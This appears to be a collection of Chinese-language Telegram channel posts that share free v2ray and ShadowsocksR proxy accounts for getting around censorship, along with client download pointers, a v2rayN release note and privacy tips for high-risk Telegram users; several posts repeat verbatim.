vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogImh0dHBzOi8vZ2l0LmlvL3Y5OTk5IiwNCiAgImFkZCI6ICJ0cjQuZnJlZTk5OTkubmV0IiwNCiAgInBvcnQiOiAiNDQzIiwNCiAgImlkIjogImFhMGU1NDc2LTA2MTMtNDI5YS1iZWRiLTI0OTIzOTAxMDQwZCIsDQogICJhaWQiOiAiMiIsDQogICJuZXQiOiAid3MiLA0KICAidHlwZSI6ICJub25lIiwNCiAgImhvc3QiOiAidHI0LmZyZWU5OTk5Lm5ldCIsDQogICJwYXRoIjogIi82MjJmLyIsDQogICJ0bHMiOiAidGxzIg0KfQ==
账号2(德国,WebSocket+TLS):
Address(地址): good.free9999.net
Port(端口):443
UUID(用户id): e5a59c58-d055-428e-b191-95fb5dcb7539
alterId(额外ID): 16
security(加密方式): auto
network(传输协议): ws
headerType(伪装类型): none
伪装域名(host):不填
路径: /ray
底层传输安全:tls
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogImh0dHBzOi8vZ2l0LmlvL3Y5OTk5ICBnb29kLmZyZWU5OTk5Lm5ldCIsDQogICJhZGQiOiAiZ29vZC5mcmVlOTk5OS5uZXQiLA0KICAicG9ydCI6ICI0NDMiLA0KICAiaWQiOiAiZTVhNTljNTgtZDA1NS00MjhlLWIxOTEtOTVmYjVkY2I3NTM5IiwNCiAgImFpZCI6ICIxNiIsDQogICJuZXQiOiAid3MiLA0KICAidHlwZSI6ICJub25lIiwNCiAgImhvc3QiOiAiIiwNCiAgInBhdGgiOiAiL3JheSIsDQogICJ0bHMiOiAidGxzIg0KfQ==
账号3(俄罗斯,WebSocket):
Address(地址): 45.147.200.250
Port(端口):19994
UUID(用户id): 884d3977-2949-4795-9db3-fd9118ba24f1
alterId(额外ID): 16
security(加密方式): auto
network(传输协议): ws
headerType(伪装类型): none
伪装域名(host):不填
路径: 不填
底层传输安全:不填
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogImh0dHBzOi8vZ2l0LmlvL3Y5OTk5IDQ1LjE0Ny4yMDAuMjUwIiwNCiAgImFkZCI6ICI0NS4xNDcuMjAwLjI1MCIsDQogICJwb3J0IjogIjE5OTk0IiwNCiAgImlkIjogIjg4NGQzOTc3LTI5NDktNDc5NS05ZGIzLWZkOTExOGJhMjRmMSIsDQogICJhaWQiOiAiMTYiLA0KICAibmV0IjogIndzIiwNCiAgInR5cGUiOiAibm9uZSIsDQogICJob3N0IjogIiIsDQogICJwYXRoIjogIiIsDQogICJ0bHMiOiAiIg0KfQ==
【v2ray客户端下载及使用方法】
windows客户端v2rayN(第三方开发) 或v2ray
Mac客户端v2rayX(第三方开发) 或 v2rayU(第三方开发) 或 v2ray
Linux客户端Qv2ray 或 v2ray
安卓客户端v2ray VPN
iOS客户端kitsunebi或Kitsunebi Lite iOS注册美区Apple ID教程
使用方法参考v2ray各平台图文使用教程
#v2ray #代理 #翻墙 #Windows #Mac #Linux #Android #iOS #中国禁闻网
信息安全技术频道🔎
@tg_InternetSecurity
账号1(德国,WebSocket+TLS+Nginx):
Address(地址): tr4.free9999.net
Port(端口):443
UUID(用户id): aa0e5476-0613-429a-bedb-24923901040d
alterId(额外ID): 2
security(加密方式): auto
network(传输协议): ws
headerType(伪装类型): none
伪装域名(host) : tr4.free9999.net
路径: /622f/
底层传输安全:tls
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogImh0dHBzOi8vZ2l0LmlvL3Y5OTk5IiwNCiAgImFkZCI6ICJ0cjQuZnJlZTk5OTkubmV0IiwNCiAgInBvcnQiOiAiNDQzIiwNCiAgImlkIjogImFhMGU1NDc2LTA2MTMtNDI5YS1iZWRiLTI0OTIzOTAxMDQwZCIsDQogICJhaWQiOiAiMiIsDQogICJuZXQiOiAid3MiLA0KICAidHlwZSI6ICJub25lIiwNCiAgImhvc3QiOiAidHI0LmZyZWU5OTk5Lm5ldCIsDQogICJwYXRoIjogIi82MjJmLyIsDQogICJ0bHMiOiAidGxzIg0KfQ==
账号2(德国,WebSocket+TLS):
Address(地址): good.free9999.net
Port(端口):443
UUID(用户id): e5a59c58-d055-428e-b191-95fb5dcb7539
alterId(额外ID): 16
security(加密方式): auto
network(传输协议): ws
headerType(伪装类型): none
伪装域名(host):不填
路径: /ray
底层传输安全:tls
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogImh0dHBzOi8vZ2l0LmlvL3Y5OTk5ICBnb29kLmZyZWU5OTk5Lm5ldCIsDQogICJhZGQiOiAiZ29vZC5mcmVlOTk5OS5uZXQiLA0KICAicG9ydCI6ICI0NDMiLA0KICAiaWQiOiAiZTVhNTljNTgtZDA1NS00MjhlLWIxOTEtOTVmYjVkY2I3NTM5IiwNCiAgImFpZCI6ICIxNiIsDQogICJuZXQiOiAid3MiLA0KICAidHlwZSI6ICJub25lIiwNCiAgImhvc3QiOiAiIiwNCiAgInBhdGgiOiAiL3JheSIsDQogICJ0bHMiOiAidGxzIg0KfQ==
账号3(俄罗斯,WebSocket):
Address(地址): 45.147.200.250
Port(端口):19994
UUID(用户id): 884d3977-2949-4795-9db3-fd9118ba24f1
alterId(额外ID): 16
security(加密方式): auto
network(传输协议): ws
headerType(伪装类型): none
伪装域名(host):不填
路径: 不填
底层传输安全:不填
vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogImh0dHBzOi8vZ2l0LmlvL3Y5OTk5IDQ1LjE0Ny4yMDAuMjUwIiwNCiAgImFkZCI6ICI0NS4xNDcuMjAwLjI1MCIsDQogICJwb3J0IjogIjE5OTk0IiwNCiAgImlkIjogIjg4NGQzOTc3LTI5NDktNDc5NS05ZGIzLWZkOTExOGJhMjRmMSIsDQogICJhaWQiOiAiMTYiLA0KICAibmV0IjogIndzIiwNCiAgInR5cGUiOiAibm9uZSIsDQogICJob3N0IjogIiIsDQogICJwYXRoIjogIiIsDQogICJ0bHMiOiAiIg0KfQ==
【v2ray客户端下载及使用方法】
windows客户端v2rayN(第三方开发) 或v2ray
Mac客户端v2rayX(第三方开发) 或 v2rayU(第三方开发) 或 v2ray
Linux客户端Qv2ray 或 v2ray
安卓客户端v2ray VPN
iOS客户端kitsunebi或Kitsunebi Lite iOS注册美区Apple ID教程
使用方法参考v2ray各平台图文使用教程
#v2ray #代理 #翻墙 #Windows #Mac #Linux #Android #iOS #中国禁闻网
信息安全技术频道🔎
@tg_InternetSecurity
GitHub
Release 7.17.3 · 2dust/v2rayN
本次更新
Windows 发布文件全部改为独立模式,不再依赖和安装 [Microsoft .NET 8.0 Desktop Runtime]
添加 ECH 配置支持
添加了证书 SHA-256 固定支持
添加了 xray hysteria2 出站支持 ,需要 xray-core v26.1.23
添加了进程匹配规则支持
特别感谢 @DHR60
Accept hosts.ics as ...
Windows 发布文件全部改为独立模式,不再依赖和安装 [Microsoft .NET 8.0 Desktop Runtime]
添加 ECH 配置支持
添加了证书 SHA-256 固定支持
添加了 xray hysteria2 出站支持 ,需要 xray-core v26.1.23
添加了进程匹配规则支持
特别感谢 @DHR60
Accept hosts.ics as ...
SSR免费账号(由中国禁闻网( bannedbook.org )官方提供)
服务器IP: 64.32.6.195
服务器端口: 2330
密码: dongtaiwang.com 9nice
加密: rc4
协议参数: 不填
混淆: plain
备注: 洛杉矶
群组名: https://github.com/Alvin9999/new-pac/wiki
ssr://NjQuMzIuNi4xOTU6MjMzMDpvcmlnaW46cmM0OnBsYWluOlpHOXVaM1JoYVhkaGJtY3VZMjl0SURsdWFXTmwvP29iZnNwYXJhbT0mcmVtYXJrcz01clNiNXAySjU1LTJTQSZncm91cD1hSFIwY0hNNkx5OW5hWFJvZFdJdVkyOXRMMEZzZG1sdU9UazVPUzl1WlhjdGNHRmpMM2RwYTJr
#Shadowsocks #代理 #翻墙 #中国禁闻网
信息安全技术频道🔎
@tg_InternetSecurity
服务器IP: 64.32.6.195
服务器端口: 2330
密码: dongtaiwang.com 9nice
加密: rc4
协议参数: 不填
混淆: plain
备注: 洛杉矶
群组名: https://github.com/Alvin9999/new-pac/wiki
ssr://NjQuMzIuNi4xOTU6MjMzMDpvcmlnaW46cmM0OnBsYWluOlpHOXVaM1JoYVhkaGJtY3VZMjl0SURsdWFXTmwvP29iZnNwYXJhbT0mcmVtYXJrcz01clNiNXAySjU1LTJTQSZncm91cD1hSFIwY0hNNkx5OW5hWFJvZFdJdVkyOXRMMEZzZG1sdU9UazVPUzl1WlhjdGNHRmpMM2RwYTJr
#Shadowsocks #代理 #翻墙 #中国禁闻网
信息安全技术频道🔎
@tg_InternetSecurity
Telegram安全守则
(1)隐私三板斧:隐藏手机号码;设置两步认证;禁止P2P语音
(2)使用虚拟号码代替真实手机号码,如 Textnow,用美国IP地址注册
(3)电脑版 Telegram不打开任何外链,不下载任何文件。请转用手机操作
(4)尽量不分享资源到 Telegram,尤其从微信QQ、淘宝支付宝等需先脱敏
(5)用不越狱的苹果手机安装 Telegram等,不安装国产软件
(6)要使用境外 Apple ID,避免使用云上贵州 iCloud
高危人士(抓到会被判刑的人):
(7)不加为联系人、尽量不私聊(防止社会工程学渗透攻击)
(8)不设 username,加好友才临时随机生成(防止大数据情报分析)
(9)只用4G蜂窝网络上网,不用任何Wifi(防止黑客网络渗透)
(10)关闭 iCloud,关闭蓝牙,关闭GPS定位(防止大数据定位抓人)
(11)关闭指纹和脸部识别解锁,只用密码解锁(防止被抓后泄密)
(12)交流私聊要用端对端私密聊天(保证账户被盗后聊天內容不泄露)
(13)频繁主动注销电报账户,如1个月转移新号(阻断帐户追踪)
#telegram #技术防身
信息安全技术频道🔎
@tg_InternetSecurity
(1)隐私三板斧:隐藏手机号码;设置两步认证;禁止P2P语音
(2)使用虚拟号码代替真实手机号码,如 Textnow,用美国IP地址注册
(3)电脑版 Telegram不打开任何外链,不下载任何文件。请转用手机操作
(4)尽量不分享资源到 Telegram,尤其从微信QQ、淘宝支付宝等需先脱敏
(5)用不越狱的苹果手机安装 Telegram等,不安装国产软件
(6)要使用境外 Apple ID,避免使用云上贵州 iCloud
高危人士(抓到会被判刑的人):
(7)不加为联系人、尽量不私聊(防止社会工程学渗透攻击)
(8)不设 username,加好友才临时随机生成(防止大数据情报分析)
(9)只用4G蜂窝网络上网,不用任何Wifi(防止黑客网络渗透)
(10)关闭 iCloud,关闭蓝牙,关闭GPS定位(防止大数据定位抓人)
(11)关闭指纹和脸部识别解锁,只用密码解锁(防止被抓后泄密)
(12)交流私聊要用端对端私密聊天(保证账户被盗后聊天內容不泄露)
(13)频繁主动注销电报账户,如1个月转移新号(阻断帐户追踪)
#telegram #技术防身
信息安全技术频道🔎
@tg_InternetSecurity